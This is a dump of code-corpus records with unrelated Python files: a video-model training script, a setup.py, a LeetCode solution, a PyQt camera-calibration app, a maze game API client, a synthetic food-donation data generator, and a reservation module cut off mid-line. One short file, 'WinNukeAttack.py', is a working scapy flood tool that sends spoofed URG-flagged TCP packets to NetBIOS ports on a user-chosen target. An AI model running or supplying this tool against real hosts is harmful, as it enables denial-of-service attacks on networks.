Loss: %.4f' % (timeSince(start, float(Epoches) / n_epoches),\n Epoches, Epoches / n_epoches * 100, loss_epoch))\n\n #if Epoches % 10 == 0:\n #torch.save(encoder, '/home/Han/Han_NIPS/model/snap_shot/our_FeaMap2_2/ratio_2/encoder_%d' % (Epoches))\n #torch.save(my_model, '/home/Han/Han_NIPS/model/snap_shot/our_FeaMap2_2/ratio_2/my_model_%d' % (Epoches))\n #torch.save(decoder, '/home/Han/Han_NIPS/model/snap_shot/our_FeaMap2_2/ratio_2/decoder_%d' % (Epoches))\n #recall_final, recall_all = test(Epoches, encoder, my_model, max_length=30)\n #print(\"Final recall for %d test videos: %.3f\" %(len(os.listdir('/home/Han/Han_NIPS/model/word_to_index_sample_60_test_percent100/')), np.mean(recall_all)))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='PyTorch 360 Video Groundu=ing')\n parser.add_argument('--batch_size', type=int, default=4, metavar='N',\n help='input batch size for training (default: 4)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='enables CUDA training')\n parser.add_argument('--video_len', type=str, default='3',\n help='video clip sample length (default: 3)')\n parser.add_argument('--MAX_LENGTH', type=str, default='33',\n help='subtitle maximum length (default: 33)') ##train 33, test 30\n args = parser.parse_args()\n\n use_cuda = torch.cuda.is_available()\n batch_size = args.batch_size\n MAX_LENGTH = int(args.MAX_LENGTH)\n hidden_size = 256\n video_len = int(args.video_len)\n img_ratio = 2\n epoches = 100\n\n nfov = NFOV('/home/Han/Han_NIPS/NIPS_data/frame_train_2/', video_len, img_ratio, train='train')\n train_loader = torch.utils.data.DataLoader(nfov, batch_size, shuffle=True, num_workers=4)\n lang_len = nfov.get_lang_length()\n my_encode = model.EncoderRNN(lang_len, hidden_size, batch_size).cuda()\n my_decode = model.DecoderRNN(lang_len, hidden_size, batch_size, MAX_LENGTH).cuda()\n trainEpoches(my_encode, my_decode, epoches, MAX_LENGTH, print_every=1)\n #train(my_encode, my_decode, MAX_LENGTH)\n","sub_path":"LanguageTest.py","file_name":"LanguageTest.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"601382630","text":"import scapy.all as scapy\nimport os\n\n\ndef WinNuke():\n\n\tclear = os.system('clear')\n\n\tprint(\"**************************************\")\n\tprint(\" WinNuke Attack\")\n\tprint(\"**************************************\")\n\tprint(\"Please input your target's IP\")\n\ttarget = input(\"[WinNuke Attack]#\")\n\tnum = 0\n\ttry:\n\t\twhile True:\n\t\t\tpacketss = scapy.IP(src=scapy.RandIP(),dst=target)/scapy.TCP(sport=scapy.RandShort(),dport=[139,138,137],flags=0x020,seq=1,window=512)\n\t\t\tscapy.send(packetss,verbose=False)\n\t\t\tnum += 1\n\t\t\tprint(\"Sent \"+str(num)+\"packets\")\n\texcept KeyboardInterrupt:\n\t\tprint(\"[-] Ctrl + C detected.......\")\n\t\nWinNuke()","sub_path":"scapy-test/scapy-test/Packet-basedAttack/WinNukeAttack.py","file_name":"WinNukeAttack.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"56941936","text":"from setuptools import setup\nfrom setuptools import find_packages, setup\n\nwith open(\"README.md\", \"r\") as fh:\n readme = fh.read()\n\nsetup(name='qfunction',\n version='1.0.144',\n url='https://github.com/gpftc/qfunction',\n license='MIT License',\n author='Reinan Br',\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n 
author_email='slimchatuba@gmail.com',\n keywords='qfunction non-extensive mechanical statistical data science',\n description=u'Library for data mining about covid-19 in brazilian cities',\n packages=find_packages(),\n install_requires=['numpy','qutip','tqdm','matplotlib','pillow','mechanicalsoup','psutil','requests','pandas'],)","sub_path":".history/setup_20210710224042.py","file_name":"setup_20210710224042.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"518810917","text":"\"\"\"\nWe have an array A of non-negative integers.\n\nFor every (contiguous) subarray B = [A[i], A[i+1], ..., A[j]] (with i <= j),\nwe take the bitwise OR of all the elements in B, obtaining a result A[i] | A[i+1] | ... | A[j].\n\nReturn the number of possible results. (Results that occur more than once are only counted\nonce in the final answer.)\n\"\"\"\nclass Solution(object):\n def subarrayBitwiseORs(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n # Brute Force TLE\n res = set()\n for i in range(len(A)):\n n = 0\n for j in range(i, len(A)):\n for a in A[i:j+1]:\n n |= a\n res.add(n)\n\n return len(res)\n\n def subarrayBitwiseORs2(self, A):\n ans = set()\n cur = {0}\n for x in A:\n cur = {x | y for y in cur} | {x}\n ans |= cur # union\n return len(ans)\n\nA = [1,2,4]\nprint(Solution().subarrayBitwiseORs2(A))","sub_path":"898BitwiseOr.py","file_name":"898BitwiseOr.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"145853184","text":"import sys\nimport cv2\nimport os\nimport time\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5 import QtWidgets, uic\nimport numpy as np\n\nimport matplotlib\n\nfrom sys import platform as sys_pf\nif sys_pf == 'darwin':\n import matplotlib\n matplotlib.use(\"TkAgg\")\n\nfrom matplotlib import pyplot as plt\nfrom numpy.linalg import inv\n\nimport time\nimport threading\n\n\npath = os.getcwd()\nqtCreatorFile = path + os.sep + \"mainwindow.ui\"\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile) \n\nimgpath = path + os.sep + \"CameraCalibration\"\nimglist = os.listdir(imgpath)\nimglistd = [i[:-4] for i in imglist]\nimglistd = np.sort(np.array(imglistd).astype('int'))\nimgSortedList = [format(i)+\".bmp\" for i in imglistd]\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n self.onBindingUI()\n\n self.imgSortedList = imgSortedList\n self.selected_img = self.imgSortedList[0]\n print(self.selected_img)\n\n self.objpoints = []\n self.imgpoints = []\n\n self.gray_imgs = []\n self.color_imgs = []\n\n # Camera parameter\n self.RMS = None\n self.camera_matrix = []\n self.distortion_coefficients = []\n self.rotation_matrix = []\n\n # pyramid\n self.pyramid_img = []\n\n # pre-read imgs in memory as array\n self.read_img()\n \n\n def read_img(self):\n for i in range(len(self.imgSortedList)):\n print(imgpath + os.sep + self.imgSortedList[i])\n img = cv2.imread(imgpath + os.sep + self.imgSortedList[i])\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n self.color_imgs.append(img)\n self.gray_imgs.append(gray)\n\n def onBindingUI(self):\n self.bt_find_corners.clicked.connect(self.on_bt_find_corners_click)\n #self.bt_intrinsic.clicked.connect(self.on_bt_find_intrinsic_click)\n self.comboBox.addItems(imgSortedList)\n 
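# Editor's sketch (aside, not part of the original record): subarrayBitwiseORs2
# above keeps only the set of distinct ORs of subarrays ending at the current
# element; that set is bounded by the bit width, giving roughly O(n * 32) work
# instead of the brute force's O(n^2) or worse:
def subarray_bitwise_ors(A):
    ans, cur = set(), set()
    for x in A:
        cur = {x | y for y in cur} | {x}   # ORs of all subarrays ending at x
        ans |= cur
    return len(ans)

assert subarray_bitwise_ors([1, 2, 4]) == 6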
self.comboBox.activated[str].connect(self.comboBox_onChanged) \n self.bt_cancel.clicked.connect(self.on_bt_cancel_click)\n\n self.bt_intrinsic.clicked.connect(self.on_bt_intrinsic_click)\n self.bt_distortion.clicked.connect(self.on_bt_distortion_click)\n self.bt_extrinsic.clicked.connect(self.on_bt_extrinsic_click)\n self.bt_augmented_reality.clicked.connect(self.on_bt_augmented_reality_click)\n\n self.bt_rot_scale_translate.clicked.connect(self.on_bt_rot_scale_translate_click)\n\n def on_bt_find_corners_click(self):\n find_corner_img = self.find_imgs_corner()\n #plt.figure(figsize=(10,10))\n for i in range(len(find_corner_img)):\n # plt.subplot(4,4,i)\n # plt.imshow(find_corner_img[i])\n t = threading.Thread(target = self.diaplay_imgs(find_corner_img[i],i))\n t.start()\n # plt.savefig(path + \"/result.jpg\")\n # self.diaplay_imgs(path + \"/result.jpg\")\n \n\n\n\n def on_bt_cancel_click(self):\n sys.exit(app.exec_())\n\n def on_bt_intrinsic_click(self):\n if len(self.camera_matrix) == 0:\n self.camera_calibration()\n print (\"Intrinsic matrix:\\n\", self.camera_matrix)\n\n def on_bt_distortion_click(self):\n #print(self.distortion_coefficients)\n if len(self.distortion_coefficients) == 0 :\n self.camera_calibration()\n print (\"Distortion matrix:\\n\", self.distortion_coefficients)\n\n def on_bt_extrinsic_click(self):\n if len(self.distortion_coefficients) == 0 :\n self.camera_calibration()\n #print(self.selected_img[:-4])\n idx = self.selected_img[:-4]\n print (\"Extrinsic matrix of img \"+idx+\" :\\n\", self.rotation_matrix[int(idx)-1])\n\n def on_bt_rot_scale_translate_click(self):\n try:\n angel = int(self.lineEdit_angle.text())\n except:\n angel = 0\n\n try:\n scale = int(self.lineEdit_scale.text())\n except:\n scale = 1.0\n\n try:\n tx = int(self.lineEdit_tx.text())\n except:\n tx = 0\n \n try:\n ty = int(self.lineEdit_ty.text())\n except:\n ty = 0\n\n imgE = cv2.imread(path + os.sep + \"OriginalTransform.png\")\n\n R = cv2.getRotationMatrix2D((130,125),angel,scale)\n\n rows,cols = imgE.shape[:2]\n H = np.float32([[1,0,tx],[0,1,ty]])\n res = cv2.warpAffine(imgE,R,(cols,rows))\n res = cv2.warpAffine(res,H,(cols,rows))\n\n t = threading.Thread(target = self.diaplay_imgs(res,0))\n t.start()\n #print(angel)\n\n def comboBox_onChanged(self,text):\n self.selected_img = text\n\n def diaplay_imgs(self, imgs, idx):\n leng = len(imgs)\n #plt.figure(figsize=(10,10))\n #for i in range(leng):\n cv2.imshow('img'+format(idx+1),imgs)\n cv2.waitKey(0)\n # time.sleep(5)\n cv2.destroyAllWindows()\n #plt.subplot(2,int(leng/2),i)\n #plt.imshow(imgs)\n\n def camera_calibration(self):\n if len(self.objpoints) == 0 :\n self.find_imgs_corner()\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(self.objpoints, self.imgpoints, self.gray_imgs[0].shape[::-1],None,None)\n self.RMS = ret\n self.camera_matrix = mtx\n self.distortion_coefficients = dist.ravel()\n \"\"\"\n # rvecs is rotation vector, not the rotation matrix\n # tvecs is translation vector\n Vr = np.array(rvecs)\n Tr = np.array(tvecs)\n extrinsics = np.concatenate((Vr, Tr), axis=1).reshape(-1,6)\n \"\"\"\n \n #print(np.array(rvecs).shape)\n # rt,_ = cv2.Rodrigues(np.array(rvecs)[0])\n\n \n\n # Tr = np.array(tvecs)\n # #rtt = np.append(rt.T, Tr[0])\n\n # ex = np.concatenate((rt, Tr[0]),axis = 1)\n\n # print(\"RT : \\n\",rt.T)\n # print(\"R : \\n\",rt)\n # #print(\"RTT : \\n\",rtt)\n # print(\"TR : \\n\",Tr[0].T[0])\n # print(\"ex : \\n\",ex)\n #print(dist)\n #print(np.array(rt).shape)\n Vr = np.array(rvecs)\n Tr = np.array(tvecs)\n for i in 
range(len(Tr)):\n rt,_ = cv2.Rodrigues(Vr[i])\n\n ex = np.concatenate((rt, Tr[i]),axis = 1)\n self.rotation_matrix.append(ex)\n \n # extrinsics = np.concatenate((Vr, Tr), axis=1).reshape(-1,6)\n # print(extrinsics)\n\n def find_imgs_corner(self):\n\n find_corner_img = []\n\n for i in range(len(self.imgSortedList)):\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 500, 0.001)\n\n objp = np.zeros((8*11,3), np.float32)\n objp[:,:2] = np.mgrid[0:11,0:8].T.reshape(-1,2)\n\n img = self.color_imgs[i]\n #print(img.shape)\n gray = self.gray_imgs[i]\n #print(gray.shape)\n\n ret, corners = cv2.findChessboardCorners(gray, (11,8),None)\n #print(ret)\n\n if ret == True:\n self.objpoints.append(objp)\n #print(np.array(corners).shape)\n corners2 = cv2.cornerSubPix(gray,corners,(11,8),(-1,-1),criteria)\n self.imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, (11,8), corners2,ret)\n img = cv2.resize(img, (600, 600)) \n find_corner_img.append(img)\n else:\n img = cv2.resize(img, (600, 600)) \n find_corner_img.append(img)\n return find_corner_img\n\n\n def on_bt_augmented_reality_click(self):\n pyramid_imgs = self.caculate_pyramid()\n\n print(len(pyramid_imgs))\n\n for i in range(len(pyramid_imgs)):\n # plt.subplot(4,4,i)\n # plt.imshow(find_corner_img[i])\n t = threading.Thread(target = self.diaplay_imgs(pyramid_imgs[i],i))\n t.start()\n\n def caculate_pyramid(self):\n pyramid_imgs = []\n if len(self.distortion_coefficients) == 0 :\n self.camera_calibration()\n\n for i in range(10):\n img = self.color_imgs[i].copy()\n _, corners = cv2.findChessboardCorners(self.gray_imgs[i], (11,8),None)\n #print(tuple(corners[0][0]))\n ################################################################################################\n p1 = corners[-1][0].reshape(len(corners[-1][0]),1)\n p1 = np.concatenate((p1, np.array([[1],[1]])),axis = 0)\n\n p2 = corners[-2][0].reshape(len(corners[-2][0]),1)\n p2 = np.concatenate((p2, np.array([[1],[1]])),axis = 0)\n\n p3 = corners[-12][0].reshape(len(corners[-12][0]),1)\n p3 = np.concatenate((p3, np.array([[1],[1]])),axis = 0)\n\n p4 = corners[-13][0].reshape(len(corners[-13][0]),1)\n p4 = np.concatenate((p4, np.array([[1],[1]])),axis = 0)\n\n p_h = corners[-11][0].reshape(len(corners[-11][0]),1)\n p_h = np.concatenate((p_h, np.array([[1],[1]])),axis = 0)\n\n p_v = corners[-82][0].reshape(len(corners[-82][0]),1)\n p_v = np.concatenate((p_v, np.array([[1],[1]])),axis = 0)\n ################################################################################################\n rt = np.concatenate((self.camera_matrix@self.rotation_matrix[i], np.array([[0.,0.,0.,1.]])),axis = 0)\n\n x1 = np.linalg.inv(rt) @ p1\n x2 = np.linalg.inv(rt) @ p2\n x3 = np.linalg.inv(rt) @ p3\n #x4 = np.linalg.inv(rt) @ p4\n x4 = x1 + (x3-x1) + (x2-x1)\n\n ################################################################################################\n x5 = x1 + (x1-x4) \n x6 = x2 + (x2-x4) \n x7 = x3 + (x3-x4) \n\n #print(x3)\n #print(x2)\n vec = np.cross((p_v-x5).T[0][:3], (p_h-x5).T[0][:3])\n\n vec = vec /(vec**2).sum()**0.5\n\n #print(\"ves+\\n\",vec)\n #print(\"ves\\n\",500*(x2-x1).T[0][:3])\n vec = np.concatenate((vec.reshape(len(vec),1), np.array([[1.]])),axis = 0)\n #print(((x3-x1).T[0][:3]**2).sum()**0.5)\n center = (x4+x5+x6+x7)/4\n x8 = center + vec*((x3-x1).T[0]**2).sum()**0.5 + 0.4*(x2-x1)\n x8[3][0] = 1\n #print(x8)\n ################################################################################################\n p1 = rt@x1\n p1 = 
p1.reshape(1,len(p1))[0][:2]\n \n p2 = rt@x2\n p2 = p2.reshape(1,len(p2))[0][:2]\n\n p3 = rt@x3\n p3 = p3.reshape(1,len(p3))[0][:2]\n\n p3 = rt@x3\n p3 = p3.reshape(1,len(p3))[0][:2]\n\n p4 = rt@x4\n p4 = p4.reshape(1,len(p4))[0][:2]\n\n p5 = rt@x5\n p5 = p5.reshape(1,len(p5))[0][:2]\n\n p6 = rt@x6\n p6 = p6.reshape(1,len(p6))[0][:2]\n\n p7 = rt@x7\n p7 = p7.reshape(1,len(p7))[0][:2]\n\n p8 = rt@x8\n #print(\"p8\\n\",p8)\n p8 = p8.reshape(1,len(p8))[0][:2]\n ################################################################################################\n\n #print(\"P1\\n\",p1)\n\n #img = cv2.circle(img,tuple(p1.astype('int')), 30, (0, 255, 255), 3)\n #img = cv2.circle(img,tuple(p2.astype('int')), 30, (0, 255, 255), 3)\n #img = cv2.circle(img,tuple(p3.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p4.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p5.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p6.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p7.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p8.astype('int')), 30, (0, 255, 255), 3)\n\n img = cv2.line(img, tuple(p4.astype('int')), tuple(p6.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p6.astype('int')), tuple(p5.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p5.astype('int')), tuple(p7.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p7.astype('int')), tuple(p4.astype('int')), (0, 0, 255), 10)\n\n img = cv2.line(img, tuple(p8.astype('int')), tuple(p4.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p8.astype('int')), tuple(p5.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p8.astype('int')), tuple(p6.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p8.astype('int')), tuple(p7.astype('int')), (0, 0, 255), 10)\n\n #img = cv2.line(img, tuple(p1.astype('int')), tuple(p8.astype('int')), (0, 0, 255), 10)\n \n \n img = cv2.resize(img, (600, 600)) \n pyramid_imgs.append(img)\n return pyramid_imgs\n # t = threading.Thread(target = self.diaplay_imgs(img,0))\n # t.start()\n # point = []\n # self.pyramid_img\n # self.color_imgs\n \n \n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())\n","sub_path":"hw1/hw1-1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"457880233","text":"import sys\nimport requests\nimport json\nfrom map_builder import Map\n\nclass Maze:\n\n def __init__(self, key, mapJson = [], command = ''):\n self.api_key = key\n self.url = \"https://lambda-treasure-hunt.herokuapp.com/api/adv/\"\n self.headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Token \" + self.api_key}\n\n self.map = Map()\n\n self.command = command\n self.pl_name = \"\",\n self.pl_cooldown = 0,\n self.pl_encumbrance = 0,\n self.pl_strength = 0,\n self.pl_speed = 0,\n self.pl_gold = 0,\n self.pl_inventory = [],\n self.pl_status = [],\n self.pl_error = [],\n self.pl_message = []\n\n def get_status(self):\n\n res = requests.get(self.url + \"init\", headers=self.headers)\n data = res.json() \n self.map.add_to_map(data)\n print(data[\"room_id\"], \"exits:\", data[\"exits\"])\n\n def add_to_map(self, room=None):\n if self.command:\n print(self.command)\n url = \"https://lambda-treasure-hunt.herokuapp.com/api/adv/move/\"\n r = requests.post(url, headers=self.headers, 
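The calibration script above rebuilds each 3x4 extrinsic matrix by hand from `cv2.calibrateCamera`'s output. That step in isolation, as a self-contained sketch (assuming `rvecs`/`tvecs` as returned by OpenCV):

```python
import numpy as np
import cv2

def extrinsics(rvecs, tvecs):
    mats = []
    for rvec, tvec in zip(rvecs, tvecs):
        R, _ = cv2.Rodrigues(rvec)  # 3x1 rotation vector -> 3x3 rotation matrix
        mats.append(np.concatenate((R, tvec.reshape(3, 1)), axis=1))  # [R | t]
    return mats
```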
json={\"direction\": self.command})\n new_room = r.json()\n print(new_room.get(\"cooldown\"))\n # print(\"New room:\", new_room[\"cooldown\"])\n self.map.add_to_map(new_room)\n else:\n print(\"Not working\")\n\n def move_to_room(self, direction):\n print(direction)\n url = \"https://lambda-treasure-hunt.herokuapp.com/api/adv/move/\"\n r = requests.post(url, headers=self.headers, json={\"direction\": direction})\n next_room = r.json()\n \n print(next_room)\n print(next_room.get(\"room_id\"))","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"562789725","text":"import pandas as pd\r\nimport csv,io\r\nimport math\r\n\r\nimport requests\r\nimport json\r\nimport pprint\r\nimport random\r\nimport datetime\r\nfrom datetime import timedelta\r\nfrom datetime import datetime\r\n\r\nfrom geopy.geocoders import Nominatim\r\n#from collections import OrderedDict\r\n#import geocoder\r\nimport collections\r\n\r\nfrom faker import Factory\r\nfake = Factory.create('en_AU')\r\n\r\nprint('Food Simple')\r\ndf_foodsimple = pd.read_csv (r'foodsimple.csv')\r\nFoodSimple_Catalog=len(df_foodsimple)\r\nprint (df_foodsimple)\r\nprint (FoodSimple_Catalog)\r\n\r\nprint('Food Fridge')\r\ndf_foodfridge = pd.read_csv (r'foodfridge.csv')\r\nFoodFridge_Catalog=len(df_foodfridge)\r\nprint (df_foodfridge)\r\nprint (FoodFridge_Catalog)\r\n\r\nprint('Food Shelf')\r\ndf_foodshelf = pd.read_csv (r'foodshelf.csv')\r\nFoodShelf_Catalog=len(df_foodshelf)\r\nprint (df_foodshelf)\r\nprint (FoodShelf_Catalog)\r\n\r\n# 3 SuperMkts acting as Donors\r\n# for 90 Days\r\n# look at using 3 separate Food Data Sets\r\n\r\n# foodsimple - every day food - all 12 items\r\n# foodfridge - choose daily from 452 items\r\n# foodshelf - choose weekly from 229 items\r\n\r\n# Supermarkets/Partners = ['FoodieLand','LoMarket','Grocertown'] \r\n\r\n# normal to low to high to low to normal \r\n# Jason Lowe Index Factor\r\n# JLOF_INDEX = [5, 3, 1, 8, 9, 1, 2, 3, 5]\r\n\r\n# Qty randomize between 20-30\r\n\r\n# Daily Simple Order Donations\r\n\r\n# Daily fridge Order Donations\r\n# 20 Random DailyItems \r\n# Qty 20-30\r\n\r\n# Weekly Shelf Order Donations\r\n# WeeklyItems\r\n# Divide by 7 to check\r\n# \r\n# each order to have 20 random items\r\n# # \r\n\r\nStartDate = \"1/10/2021\"\r\norderStartDate = datetime.strptime(StartDate, \"%m/%d/%Y\")\r\n \r\n# open orderItems file for writing\r\n\r\norderHdr = {'OrderId': [],\r\n 'PartnerId': [],\r\n 'OrderTotal': [],\r\n 'OrderDate': [],\r\n 'PartnerName': [],\r\n 'PartnerGeoLat': [],\r\n 'PartnerGeoLon': []\r\n }\r\n \r\norderItems = {'OrderId': [],\r\n 'OrderItemId': [],\r\n 'ProductType': [],\r\n 'ProductItem': [],\r\n 'ProductPeriod': [],\r\n 'ProductDetails': [],\r\n 'ProductStorage': [],\r\n 'Quantity': []\r\n }\r\n \r\nPartners = ['FoodieLand','LoMarket','Grocertown']\r\n \r\ng_lat=-27.467990\r\ng_lon=153.028090\r\n# Lat, Lon for 261 Quuen St, Brisbane\r\n\r\nPartnerGroup = 3\r\nPeriod = 90 #days \r\nStart_OrderID=20050\r\nStart_CustomerID=190050\r\nLow_Item_No=20\r\nHigh_Item_No=30\r\n# Jason Lowe Index Factor to create some peaks and lowes \r\nJLOF_INDEX = [5, 3, 1, 8, 9, 1, 2, 3, 5, 4, 3, 2, 6, 8, 9]\r\n\r\nfor i in range(0,PartnerGroup,1):\r\n \r\n partner_name = Partners[i]\r\n newLatBit=float(random.randrange(-750,750,1)/10000.0000)\r\n newLonBit=float(random.randrange(-750,750,1)/10000.0000)\r\n newLat = g_lat +newLatBit\r\n newLon = g_lon +newLonBit\r\n\r\n 
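The maze client above posts JSON and parses the reply without checking the HTTP status. A hedged sketch of a safer wrapper (helper name and timeout are illustrative, not part of the original API):

```python
import requests

def post_move(api_key, direction, timeout=10):
    url = "https://lambda-treasure-hunt.herokuapp.com/api/adv/move/"
    headers = {"Content-Type": "application/json",
               "Authorization": "Token " + api_key}
    r = requests.post(url, headers=headers, json={"direction": direction},
                      timeout=timeout)
    r.raise_for_status()  # fail loudly instead of parsing an error page
    return r.json()
```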
orderFreq=random.randrange(12,30,1)\r\n    duration=math.floor(Period/orderFreq)\r\n    \r\n    # for each day\r\n    for j in range(1,Period,1) :\r\n        \r\n        orderHdr['PartnerId'].append(Start_CustomerID+i)  # autogen \r\n        orderHdr['OrderId'].append(Start_OrderID+j) # autogen \r\n        orderHdr['PartnerName'].append(partner_name) \r\n        orderHdr['OrderTotal'].append(str(2000)) # autogen  # autogen \r\n        orderHdr['OrderDate'].append(orderStartDate + timedelta(days=j)) \r\n        orderHdr['PartnerGeoLat'].append(newLat)\r\n        orderHdr['PartnerGeoLon'].append(newLon)\r\n        \r\n        local_OrderItemId = 1\r\n        \r\n        #Simple Daily Food\r\n        for k in range(0,FoodSimple_Catalog-1,1):\r\n            \r\n            Food_Index=k\r\n            local_Quantity=random.randrange(Low_Item_No,High_Item_No,1)\r\n            # print (math.floor(j/7))\r\n            local_Quantity=local_Quantity * JLOF_INDEX[math.floor(j/7)]\r\n            \r\n            orderItems['OrderId'].append(Start_OrderID+j)\r\n            orderItems['OrderItemId'].append(str(local_OrderItemId)) \r\n            orderItems['ProductType'].append(df_foodsimple.loc[Food_Index][\"TYPE\"]) \r\n            orderItems['ProductItem'].append(df_foodsimple.loc[Food_Index][\"ITEM\"]) \r\n            orderItems['ProductPeriod'].append(df_foodsimple.loc[Food_Index][\"PERIOD\"]) \r\n            orderItems['ProductDetails'].append(df_foodsimple.loc[Food_Index][\"DETAILS\"]) \r\n            orderItems['ProductStorage'].append(df_foodsimple.loc[Food_Index][\"STORAGE\"]) \r\n            orderItems['Quantity'].append(local_Quantity) \r\n            local_OrderItemId=local_OrderItemId+1\r\n        \r\n        #Simple Daily Fridge Food\r\n        orderItemNos=random.randrange(Low_Item_No,High_Item_No,1)    \r\n        for k in range(1,orderItemNos,1):\r\n            \r\n            Food_Index=random.randrange(1,FoodFridge_Catalog,1)\r\n            local_Quantity=random.randrange(Low_Item_No,High_Item_No,1)\r\n            local_Quantity=local_Quantity * JLOF_INDEX[math.floor(j/7)]\r\n            \r\n            orderItems['OrderId'].append(Start_OrderID+j)\r\n            orderItems['OrderItemId'].append(str(local_OrderItemId)) \r\n            orderItems['ProductType'].append(df_foodfridge.loc[Food_Index][\"TYPE\"]) \r\n            orderItems['ProductItem'].append(df_foodfridge.loc[Food_Index][\"ITEM\"]) \r\n            orderItems['ProductPeriod'].append(df_foodfridge.loc[Food_Index][\"PERIOD\"]) \r\n            orderItems['ProductDetails'].append(df_foodfridge.loc[Food_Index][\"DETAILS\"]) \r\n            orderItems['ProductStorage'].append(df_foodfridge.loc[Food_Index][\"STORAGE\"])\r\n            orderItems['Quantity'].append(local_Quantity) \r\n            local_OrderItemId=local_OrderItemId+1\r\n        \r\n        #Weekly Shelf Food\r\n        orderItemNos=random.randrange(Low_Item_No,High_Item_No,1)    \r\n        if (j % 7 == 0) : # weekly gate on the day counter j; the original 'Period % 7' is constant and never fires for Period=90\r\n            for k in range(1,orderItemNos,1):\r\n                \r\n                Food_Index=random.randrange(1,FoodShelf_Catalog,1)\r\n                local_Quantity=random.randrange(Low_Item_No,High_Item_No,1)\r\n                local_Quantity=local_Quantity * JLOF_INDEX[math.floor(j/7)]\r\n                \r\n                orderItems['OrderId'].append(Start_OrderID+j)\r\n                orderItems['OrderItemId'].append(str(local_OrderItemId)) \r\n                orderItems['ProductType'].append(df_foodshelf.loc[Food_Index][\"TYPE\"]) \r\n                orderItems['ProductItem'].append(df_foodshelf.loc[Food_Index][\"ITEM\"]) \r\n                orderItems['ProductPeriod'].append(df_foodshelf.loc[Food_Index][\"PERIOD\"]) \r\n                orderItems['ProductDetails'].append(df_foodshelf.loc[Food_Index][\"DETAILS\"]) \r\n                orderItems['ProductStorage'].append(df_foodshelf.loc[Food_Index][\"STORAGE\"])\r\n                orderItems['Quantity'].append(local_Quantity) \r\n                local_OrderItemId=local_OrderItemId+1\r\n    \r\ndf_orderItems = pd.DataFrame(orderItems)\r\ndf_orderItems.to_csv (r'orderItemsDonations.csv', index = False, header=True)\r\nprint (df_orderItems)\r\n \r\ndf_orderHdr = 
pd.DataFrame(orderHdr)\r\ndf_orderHdr.to_csv (r'orderHeaderDonations.csv', index = False, header=True)\r\nprint (df_orderHdr)\r\n","sub_path":"src/partnerDonationsv1.py","file_name":"partnerDonationsv1.py","file_ext":"py","file_size_in_byte":6927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"41785667","text":"\"\"\"Functions connected with reservation feature.\"\"\"\n\nimport datetime\n\nimport db\nimport dbcommon\nfrom sqlalchemy import text\nfrom sqlalchemy.sql.expression import func, and_, or_, not_, false\n\n\ndef switch_to_dev_mode(machine, stream_id=None, build_id=None, config_id=None, scenario_id=None, system_id=None, submitted_by=None):\n submitted_by = unicode(submitted_by) if submitted_by else u\"MachineReserver\"\n stream_entity = stream_id if stream_id else u\"fake\"\n build_entity = build_id if build_id else u\"fake-1\"\n scenario_entity = scenario_id if scenario_id else u\"switch-to-DEV-OS\"\n config_entity = config_id if config_id else u'default'\n system_entity = system_id if system_id else u\"fake\"\n\n if machine.task:\n task_id = machine.task.id\n dbcommon.cancel_task(machine.task.id)\n dbcommon.rerun_task(task_id, u\"MachineReserver\")\n # process cancel immediately\n dbcommon.generic_reboot(machine)\n # add service task for switching os'\n build = dbcommon.get_entity(db.Build, build_entity, False) # fake build\n config = dbcommon.get_entity(db.Config, config_entity, False)\n system = dbcommon.get_entity(db.System, system_entity)\n scenario = dbcommon.get_entity(db.Scenario, scenario_entity)\n stream = dbcommon.get_entity(db.Stream, stream_entity)\n bundle = dbcommon.get_or_create_bundle_from_products(stream.branch, build, [scenario.tool])\n task_id = dbcommon.add_task_no_check(None, stream.id, build.id, machine.machines_group_id, scenario.id, config.id, system.id,\n bundle.id, machine_id=machine.id, submitted_by=submitted_by) # pylint: disable=E1103\n db.session.commit()\n return task_id\n\n\ndef _get_reservations_query(machine_id, start=None, end=None, user=None, obsolete=False, dev=False, reservation_period=None):\n q = 